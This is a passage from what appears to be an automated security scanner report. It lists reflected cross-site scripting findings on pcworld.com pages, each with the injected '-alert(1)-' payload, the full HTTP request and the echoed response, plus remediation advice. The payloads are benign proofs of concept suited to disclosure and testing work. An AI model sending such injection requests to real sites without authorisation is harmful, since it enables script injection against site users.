User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:50:36 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/article/192499/printer_buying_guide_shopping_smart.html2c921'-alert(1)-'6b04ed13bb7';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '?tk%3Dfv_rel';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pc
...[SNIP]...

1.6. http://www.pcworld.com/article/200323/microsoft_kin_a_not_so_fond_farewell.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /article/200323/microsoft_kin_a_not_so_fond_farewell.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4eb3a'-alert(1)-'0e2d05b2ef1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article/200323/microsoft_kin_a_not_so_fond_farewell.html4eb3a'-alert(1)-'0e2d05b2ef1 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B7EE6EFF17103B811B61CF677EE14070; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:52:36 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
serEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/article/200323/microsoft_kin_a_not_so_fond_farewell.html4eb3a'-alert(1)-'0e2d05b2ef1';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.7. http://www.pcworld.com/article/202806/11_mobile_web_annoyances_and_how_to_fix_them.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /article/202806/11_mobile_web_annoyances_and_how_to_fix_them.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8162'-alert(1)-'0eff82be825 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article/202806/11_mobile_web_annoyances_and_how_to_fix_them.htmla8162'-alert(1)-'0eff82be825?tk=fv_rel HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=87DC7E4BE97E880FCA087C82BBB0E16B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:52:09 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/article/202806/11_mobile_web_annoyances_and_how_to_fix_them.htmla8162'-alert(1)-'0eff82be825';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '?tk%3Dfv_rel';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pc
...[SNIP]...

1.8. http://www.pcworld.com/article/210473/eliminate_duplicate_files_with_free_utility.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /article/210473/eliminate_duplicate_files_with_free_utility.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6cc44'-alert(1)-'51b70dce3e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article/210473/eliminate_duplicate_files_with_free_utility.html6cc44'-alert(1)-'51b70dce3e2 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8E1432EB6F27621EB549305D4F13A686; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:53:17 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
l');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/article/210473/eliminate_duplicate_files_with_free_utility.html6cc44'-alert(1)-'51b70dce3e2';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.9. http://www.pcworld.com/article/210480/2010/11/iphone_annoyances.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /article/210480/2010/11/iphone_annoyances.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6a2b'-alert(1)-'bfd8c107ffd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article/210480/2010a6a2b'-alert(1)-'bfd8c107ffd/11/iphone_annoyances.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:51:21 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:51:20 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...

   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/article/210480/2010a6a2b'-alert(1)-'bfd8c107ffd/11/iphone_annoyances.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       documen
...[SNIP]...

1.10. http://www.pcworld.com/article/210480/2010/11/iphone_annoyances.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /article/210480/2010/11/iphone_annoyances.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd1e1'-alert(1)-'6cbd92db32d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article/210480/2010/11dd1e1'-alert(1)-'6cbd92db32d/iphone_annoyances.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:51:24 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=AF897621C0F2F1644A0B9FC5D2096421; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:51:24 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ogon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/article/210480/2010/11dd1e1'-alert(1)-'6cbd92db32d/iphone_annoyances.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.c
...[SNIP]...

1.11. http://www.pcworld.com/article/210480/top_10_iphone_annoyancesand_how_to_fix_them.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /article/210480/top_10_iphone_annoyancesand_how_to_fix_them.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53afa'-alert(1)-'3daa6b018af was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article/210480/top_10_iphone_annoyancesand_how_to_fix_them.html53afa'-alert(1)-'3daa6b018af?tk=hp_fv HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D2F55F4F326306AF352BA12283116871; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:51:09 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
l');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/article/210480/top_10_iphone_annoyancesand_how_to_fix_them.html53afa'-alert(1)-'3daa6b018af';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '?tk%3Dhp_fv';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw
...[SNIP]...

1.12. http://www.pcworld.com/blogs/id,56/today_pcworld.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,56/today_pcworld.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e65ca'-alert(1)-'d4811fbe772 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/e65ca'-alert(1)-'d4811fbe772/today_pcworld.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:56:33 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=5575FF258AECFAE8D3FB875EDC4E5C46; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:56:32 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/e65ca'-alert(1)-'d4811fbe772/today_pcworld.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cooki
...[SNIP]...

1.13. http://www.pcworld.com/blogs/id,56/today_pcworld.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,56/today_pcworld.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f24c4'-alert(1)-'b9c23a75667 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,56/today_pcworld.htmlf24c4'-alert(1)-'b9c23a75667 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B9EA43C8697AD2AB26FDD9A420011CF6; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:56:35 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
rEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,56/today_pcworld.htmlf24c4'-alert(1)-'b9c23a75667';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.14. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,56/today_pcworld.html/x26amp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab47c'-alert(1)-'3aaa6e20c13 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ab47c'-alert(1)-'3aaa6e20c13/today_pcworld.html/x26amp;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=35B186AFE81C6A0F56A6C33759C2A2D6; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:07:44 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/ab47c'-alert(1)-'3aaa6e20c13/today_pcworld.html/x26amp;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6J
...[SNIP]...

1.15. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,56/today_pcworld.html/x26amp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91502'-alert(1)-'477a2da820e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,56/today_pcworld.html91502'-alert(1)-'477a2da820e/x26amp;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1CC6EFB7DECEF9E6F1F04640CD958D7D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:07:47 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
rEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,56/today_pcworld.html91502'-alert(1)-'477a2da820e/x26amp;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x2
...[SNIP]...

1.16. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,56/today_pcworld.html/x26amp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c43ab'-alert(1)-'271b75ab08a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,56/today_pcworld.html/x26ampc43ab'-alert(1)-'271b75ab08a;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9C2620E7A72D1DDCEBCE396E4A43B583; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:07:50 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
= pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,56/today_pcworld.html/x26ampc43ab'-alert(1)-'271b75ab08a;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eT
...[SNIP]...

1.17. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,56/today_pcworld.html/x26amp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb3ee'-alert(1)-'2085dd5c883 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,56/today_pcworld.html/x26amp;rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88&eb3ee'-alert(1)-'2085dd5c883=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4A423733B2DC6B04E15F1F146F762805; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:07:41 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
mp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday38eae'-alert(1)-'a9380993a88&eb3ee'-alert(1)-'2085dd5c883=1';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri
...[SNIP]...

1.18. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday&5c0d3'-alert(1)-'6eddebac90a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,56/today_pcworld.html/x26amp

Issue detail

The value of the rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday&5c0d3'-alert(1)-'6eddebac90a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb1da'-alert(1)-'c77cdea635b was submitted in the rct//x3dj//x26amp;sa//x3dX//x26amp;ei//x3dD9bgTLzBDIT7lwedwo2YAw//x26amp;sqi//x3d2//x26amp;ved//x3d0CHYQ6QUoAQ//x26amp;q//x3dcloud+storage//x26amp;usg//x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w//x22//x3eToday&5c0d3'-alert(1)-'6eddebac90a parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

